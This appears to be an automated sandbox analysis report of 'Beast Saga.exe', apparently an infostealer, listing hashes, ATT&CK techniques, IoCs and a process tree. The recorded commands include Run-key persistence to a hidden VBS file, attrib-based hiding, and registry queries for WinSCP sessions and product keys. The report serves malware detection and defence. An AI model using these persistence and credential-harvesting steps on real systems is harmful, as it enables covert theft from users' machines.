9d01cc40a00fbfa3980694feca66274987c1a97661cb32522966545bf2ba4941

Analysis

max time kernel
41s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
24/01/2024, 05:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Beast Saga.exe
Size

71.3MB
MD5

93c3344f22025f10f6b255b2eb31f07e
SHA1

46897dc45a8d44526f295f7bec4b5e41f9c3279f
SHA256

9d01cc40a00fbfa3980694feca66274987c1a97661cb32522966545bf2ba4941
SHA512

3ae836ee35125a9d5a0161c35792ec3ae7c75eef348acfaad5fe89325caa382d00cfd895053fd5a164e26429425d102d67babbb8d2cd4de031b4760525fc955f
SSDEEP

1572864:U4/4rzOchP4UjNew3PkfiR3e/QVkh8w61pdvQNU29L5hFl37:fkqcdrJpcfiR3lkGwazcRl37

Score

7^/10

persistence spyware stealer

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	Beast Saga.exe

Executes dropped EXE 3 IoCs

pid	Process
1916	Beast Saga.exe
708	Beast Saga.exe
1844	Beast Saga.exe

Loads dropped DLL 12 IoCs

pid	Process
3544	Beast Saga.exe
3544	Beast Saga.exe
3544	Beast Saga.exe
1916	Beast Saga.exe
1916	Beast Saga.exe
1916	Beast Saga.exe
1916	Beast Saga.exe
708	Beast Saga.exe
708	Beast Saga.exe
708	Beast Saga.exe
708	Beast Saga.exe
1844	Beast Saga.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Start_XkIyAG = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\sysWin10Boot_XkIyAG.vbs"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
26	ipinfo.io
27	ipinfo.io
40	ipinfo.io
42	ipinfo.io

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Beast Saga.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	Beast Saga.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	Beast Saga.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	Beast Saga.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2	Beast Saga.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Beast Saga.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Beast Saga.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
11440	WMIC.exe

Enumerates processes with tasklist 1 TTPs 64 IoCs

Process Discovery

T1057

pid	Process
7976	tasklist.exe
7960	tasklist.exe
7892	tasklist.exe
4396	tasklist.exe
9020	tasklist.exe
8748	tasklist.exe
8616	tasklist.exe
7996	tasklist.exe
7876	tasklist.exe
7616	tasklist.exe
7632	tasklist.exe
7568	tasklist.exe
8796	tasklist.exe
9244	tasklist.exe
8984	tasklist.exe
8832	tasklist.exe
7852	tasklist.exe
7208	tasklist.exe
8756	tasklist.exe
8624	tasklist.exe
8420	tasklist.exe
8264	tasklist.exe
7712	tasklist.exe
8148	tasklist.exe
7860	tasklist.exe
7820	tasklist.exe
8064	tasklist.exe
9160	tasklist.exe
9676	tasklist.exe
8684	tasklist.exe
6864	tasklist.exe
5672	tasklist.exe
11960	tasklist.exe
9140	tasklist.exe
8272	tasklist.exe
7588	tasklist.exe
7560	tasklist.exe
7720	tasklist.exe
8772	tasklist.exe
8704	tasklist.exe
7924	tasklist.exe
7916	tasklist.exe
7804	tasklist.exe
8592	tasklist.exe
8452	tasklist.exe
7952	tasklist.exe
7116	tasklist.exe
9012	tasklist.exe
8976	tasklist.exe
8924	tasklist.exe
8764	tasklist.exe
7812	tasklist.exe
7236	tasklist.exe
7608	tasklist.exe
8908	tasklist.exe
8600	tasklist.exe
8124	tasklist.exe
8108	tasklist.exe
8004	tasklist.exe
7704	tasklist.exe
7624	tasklist.exe
8840	tasklist.exe
8640	tasklist.exe
8244	tasklist.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 41 IoCs

pid	Process
1916	Beast Saga.exe
1916	Beast Saga.exe
1916	Beast Saga.exe
1916	Beast Saga.exe
1844	Beast Saga.exe
1844	Beast Saga.exe
11540	powershell.exe
11540	powershell.exe
11540	powershell.exe
11760	powershell.exe
11760	powershell.exe
11760	powershell.exe
6808	powershell.exe
6808	powershell.exe
6808	powershell.exe
7912	powershell.exe
7912	powershell.exe
2528	powershell.exe
2528	powershell.exe
7780	powershell.exe
7780	powershell.exe
6980	powershell.exe
6980	powershell.exe
2528	powershell.exe
7780	powershell.exe
7912	powershell.exe
6980	powershell.exe
7256	powershell.exe
7256	powershell.exe
7256	powershell.exe
8644	powershell.exe
8644	powershell.exe
8644	powershell.exe
1164	powershell.exe
1164	powershell.exe
1164	powershell.exe
8520	powershell.exe
8520	powershell.exe
8520	powershell.exe
5400	powershell.exe
5400	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	3544	Beast Saga.exe
Token: SeDebugPrivilege	4396	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4268	cmd.exe
Token: SeSecurityPrivilege	4268	cmd.exe
Token: SeTakeOwnershipPrivilege	4268	cmd.exe
Token: SeLoadDriverPrivilege	4268	cmd.exe
Token: SeSystemProfilePrivilege	4268	cmd.exe
Token: SeSystemtimePrivilege	4268	cmd.exe
Token: SeProfSingleProcessPrivilege	4268	cmd.exe
Token: SeIncBasePriorityPrivilege	4268	cmd.exe
Token: SeCreatePagefilePrivilege	4268	cmd.exe
Token: SeBackupPrivilege	4268	cmd.exe
Token: SeRestorePrivilege	4268	cmd.exe
Token: SeShutdownPrivilege	4268	cmd.exe
Token: SeDebugPrivilege	4268	cmd.exe
Token: SeSystemEnvironmentPrivilege	4268	cmd.exe
Token: SeRemoteShutdownPrivilege	4268	cmd.exe
Token: SeUndockPrivilege	4268	cmd.exe
Token: SeManageVolumePrivilege	4268	cmd.exe
Token: 33	4268	cmd.exe
Token: 34	4268	cmd.exe
Token: 35	4268	cmd.exe
Token: 36	4268	cmd.exe
Token: SeIncreaseQuotaPrivilege	4268	cmd.exe
Token: SeSecurityPrivilege	4268	cmd.exe
Token: SeTakeOwnershipPrivilege	4268	cmd.exe
Token: SeLoadDriverPrivilege	4268	cmd.exe
Token: SeSystemProfilePrivilege	4268	cmd.exe
Token: SeSystemtimePrivilege	4268	cmd.exe
Token: SeProfSingleProcessPrivilege	4268	cmd.exe
Token: SeIncBasePriorityPrivilege	4268	cmd.exe
Token: SeCreatePagefilePrivilege	4268	cmd.exe
Token: SeBackupPrivilege	4268	cmd.exe
Token: SeRestorePrivilege	4268	cmd.exe
Token: SeShutdownPrivilege	4268	cmd.exe
Token: SeDebugPrivilege	4268	cmd.exe
Token: SeSystemEnvironmentPrivilege	4268	cmd.exe
Token: SeRemoteShutdownPrivilege	4268	cmd.exe
Token: SeUndockPrivilege	4268	cmd.exe
Token: SeManageVolumePrivilege	4268	cmd.exe
Token: 33	4268	cmd.exe
Token: 34	4268	cmd.exe
Token: 35	4268	cmd.exe
Token: 36	4268	cmd.exe
Token: SeShutdownPrivilege	1916	Beast Saga.exe
Token: SeCreatePagefilePrivilege	1916	Beast Saga.exe
Token: SeDebugPrivilege	5672	tasklist.exe
Token: SeDebugPrivilege	7332	tasklist.exe
Token: SeDebugPrivilege	7804	reg.exe
Token: SeDebugPrivilege	7608	tasklist.exe
Token: SeDebugPrivilege	7704	tasklist.exe
Token: SeDebugPrivilege	7236	tasklist.exe
Token: SeDebugPrivilege	7736	tasklist.exe
Token: SeDebugPrivilege	8076	tasklist.exe
Token: SeDebugPrivilege	7456	tasklist.exe
Token: SeDebugPrivilege	7916	tasklist.exe
Token: SeDebugPrivilege	7568	tasklist.exe
Token: SeDebugPrivilege	8116	tasklist.exe
Token: SeDebugPrivilege	7720	tasklist.exe
Token: SeDebugPrivilege	7876	tasklist.exe
Token: SeDebugPrivilege	7852	tasklist.exe
Token: SeShutdownPrivilege	1916	Beast Saga.exe
Token: SeCreatePagefilePrivilege	1916	Beast Saga.exe
Token: SeDebugPrivilege	7588	tasklist.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3544 wrote to memory of 1916	3544	Beast Saga.exe	91
PID 3544 wrote to memory of 1916	3544	Beast Saga.exe	91
PID 1916 wrote to memory of 4964	1916	Beast Saga.exe	410
PID 1916 wrote to memory of 4964	1916	Beast Saga.exe	410
PID 4964 wrote to memory of 4396	4964	cmd.exe	96
PID 4964 wrote to memory of 4396	4964	cmd.exe	96
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 708	1916	Beast Saga.exe	95
PID 1916 wrote to memory of 1844	1916	Beast Saga.exe	97
PID 1916 wrote to memory of 1844	1916	Beast Saga.exe	97
PID 1916 wrote to memory of 2396	1916	Beast Saga.exe	409
PID 1916 wrote to memory of 2396	1916	Beast Saga.exe	409
PID 2396 wrote to memory of 4268	2396	cmd.exe	524
PID 2396 wrote to memory of 4268	2396	cmd.exe	524
PID 1916 wrote to memory of 5004	1916	Beast Saga.exe	408
PID 1916 wrote to memory of 5004	1916	Beast Saga.exe	408
PID 1916 wrote to memory of 2304	1916	Beast Saga.exe	407
PID 1916 wrote to memory of 2304	1916	Beast Saga.exe	407
PID 1916 wrote to memory of 2860	1916	Beast Saga.exe	458
PID 1916 wrote to memory of 2860	1916	Beast Saga.exe	458
PID 1916 wrote to memory of 936	1916	Beast Saga.exe	403
PID 1916 wrote to memory of 936	1916	Beast Saga.exe	403
PID 1916 wrote to memory of 1164	1916	Beast Saga.exe	467
PID 1916 wrote to memory of 1164	1916	Beast Saga.exe	467
PID 1916 wrote to memory of 2072	1916	Beast Saga.exe	400
PID 1916 wrote to memory of 2072	1916	Beast Saga.exe	400

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
11352	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Beast Saga.exe
"C:\Users\Admin\AppData\Local\Temp\Beast Saga.exe"
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3544
- C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\Beast Saga.exe
  "C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\Beast Saga.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1916
- - C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\Beast Saga.exe
    "C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\Beast Saga.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1516 --field-trial-handle=1748,10882465382172539408,2542723803599405887,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:708
- - C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\Beast Saga.exe
    "C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\Beast Saga.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1952 --field-trial-handle=1748,10882465382172539408,2542723803599405887,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    PID:1844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1624
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6280
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:9140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6528
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:9012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
    3⤵
    PID:11304
  - - C:\Windows\system32\more.com
      more +1
      4⤵
      PID:11352
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get name
      4⤵
      PID:11344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
    3⤵
    PID:11400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:11500
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
      4⤵
      PID:11856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
    3⤵
    PID:11720
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:11760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
    3⤵
    PID:6904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
    3⤵
    PID:6816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:11920
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:11960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\resources\app.asar.unpacked\bind\main.exe"
    3⤵
    PID:6780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "net session"
    3⤵
    PID:6752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6608
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
      4⤵
      PID:2020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5564
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_XkIyAG.vbs\""
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:8520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4472
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"
      4⤵
      PID:6952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3284
